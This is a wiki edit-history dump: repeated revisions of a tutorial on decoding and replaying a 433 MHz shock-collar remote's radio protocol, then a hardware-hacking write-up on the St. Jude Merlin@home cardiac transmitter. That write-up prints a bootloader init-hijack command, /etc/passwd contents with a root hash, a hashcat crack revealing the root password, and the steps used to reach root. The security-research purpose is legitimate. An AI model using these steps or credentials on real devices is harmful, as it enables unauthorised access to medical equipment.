Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2819RF Signal Analysis2017-08-07T00:50:26Z<p>Rjmendez: </p>
<hr />
<div>This page will be to cover some basic RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2818RF Signal Analysis2017-08-07T00:30:23Z<p>Rjmendez: </p>
<hr />
<div>This page will be to cover some basic blind RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=User:Rjmendez&diff=2817User:Rjmendez2017-08-06T22:23:07Z<p>Rjmendez: Rjmendez moved page User:Rjmendez to Blind RF Signal Analysis</p>
<hr />
<div>#REDIRECT [[Blind RF Signal Analysis]]</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2816RF Signal Analysis2017-08-06T22:23:07Z<p>Rjmendez: Rjmendez moved page User:Rjmendez to Blind RF Signal Analysis</p>
<hr />
<div>This page will be to cover some basic blind RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png]]<br />
[[File:Inspect_ook_gr-fosphor.png]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2815RF Signal Analysis2017-08-06T22:21:42Z<p>Rjmendez: Created page with "This page will be to cover some basic blind RF signal analysis. == About == Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, dev..."</p>
<hr />
<div>This page will be to cover some basic blind RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png]]<br />
[[File:Inspect_ook_gr-fosphor.png]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete the code here. https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Remote.jpg&diff=2814File:Remote.jpg2017-08-06T21:46:44Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Collar_protocol_packet.PNG&diff=2813File:Collar protocol packet.PNG2017-08-06T21:42:40Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Decoded_packets.png&diff=2812File:Decoded packets.png2017-08-06T21:42:05Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:URH_NRZ_replace.png&diff=2811File:URH NRZ replace.png2017-08-06T21:41:41Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:URH_waveform_demod.png&diff=2810File:URH waveform demod.png2017-08-06T21:41:09Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Inspectrum_ook.png&diff=2809File:Inspectrum ook.png2017-08-06T21:40:40Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Inspect_ook_gr-fosphor.png&diff=2808File:Inspect ook gr-fosphor.png2017-08-06T21:39:28Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Inspect_ook_grc.png&diff=2807File:Inspect ook grc.png2017-08-06T21:39:04Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Shock_Collar.jpg&diff=2806File:Shock Collar.jpg2017-08-06T21:37:39Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:B4Z-RF400401_fccid.io.PNG&diff=2805File:B4Z-RF400401 fccid.io.PNG2017-08-06T21:36:11Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2702SJM Merlin at Home2017-05-15T01:48:56Z<p>Rjmendez: </p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Lets break this.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to login as root fail, what was going on with that operator user?<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Lets set the password to "test" and attempt logging in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
<br />
== Taking Things Further ==<br />
<br />
Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
